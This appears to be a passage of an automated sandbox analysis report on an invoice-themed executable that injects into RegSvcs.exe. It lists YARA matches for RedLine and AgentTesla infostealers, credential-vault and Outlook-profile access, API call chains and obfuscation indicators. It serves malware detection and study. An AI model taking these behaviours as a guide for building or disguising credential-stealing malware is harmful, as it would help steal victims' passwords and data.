                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040FA100_2_0040FA10
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00423C810_2_00423C81
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00411E780_2_00411E78
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00442E0C0_2_00442E0C
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00420EC00_2_00420EC0
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044CF170_2_0044CF17
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00444FD20_2_00444FD2
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_03CD36580_2_03CD3658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004016502_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00C4D1C82_2_00C4D1C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00C4DDE02_2_00C4DDE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00C410302_2_00C41030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00C4D5102_2_00C4D510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00C40FD02_2_00C40FD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0589C6782_2_0589C678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_058992582_2_05899258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0589001B2_2_0589001B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_058900402_2_05890040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: String function: 004115D7 appears 36 times
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: String function: 00416C70 appears 39 times
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: String function: 00445AE0 appears 65 times
                  Source: INV & BANK DETAILS.exe, 00000000.00000003.1424571360.000000000419D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV & BANK DETAILS.exe
                  Source: INV & BANK DETAILS.exe, 00000000.00000003.1424330580.0000000003FF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV & BANK DETAILS.exe
                  Source: INV & BANK DETAILS.exe, 00000000.00000002.1431447350.0000000000B50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef9d47a30-40bd-47e7-9cba-99d2e7194625.exe4 vs INV & BANK DETAILS.exe
                  Source: INV & BANK DETAILS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.INV & BANK DETAILS.exe.b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000002.00000002.3865437194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000000.00000002.1431447350.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@2/2
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\autA848.tmpJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCommand line argument: Wu0_2_0040D6B0
                  Source: INV & BANK DETAILS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: INV & BANK DETAILS.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeFile read: C:\Users\user\Desktop\INV & BANK DETAILS.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\INV & BANK DETAILS.exe "C:\Users\user\Desktop\INV & BANK DETAILS.exe"
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INV & BANK DETAILS.exe"
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INV & BANK DETAILS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: INV & BANK DETAILS.exe, 00000000.00000003.1424571360.0000000004070000.00000004.00001000.00020000.00000000.sdmp, INV & BANK DETAILS.exe, 00000000.00000003.1423214260.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: INV & BANK DETAILS.exe, 00000000.00000003.1424571360.0000000004070000.00000004.00001000.00020000.00000000.sdmp, INV & BANK DETAILS.exe, 00000000.00000003.1423214260.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: INV & BANK DETAILS.exeStatic PE information: real checksum: 0xa961f should be: 0xf0c3d
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00C44F60 push edx; ret 2_2_00C44F63
                  Source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fNeolpUwnEVuo', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fNeolpUwnEVuo', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fNeolpUwnEVuo', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fNeolpUwnEVuo', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'fNeolpUwnEVuo', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
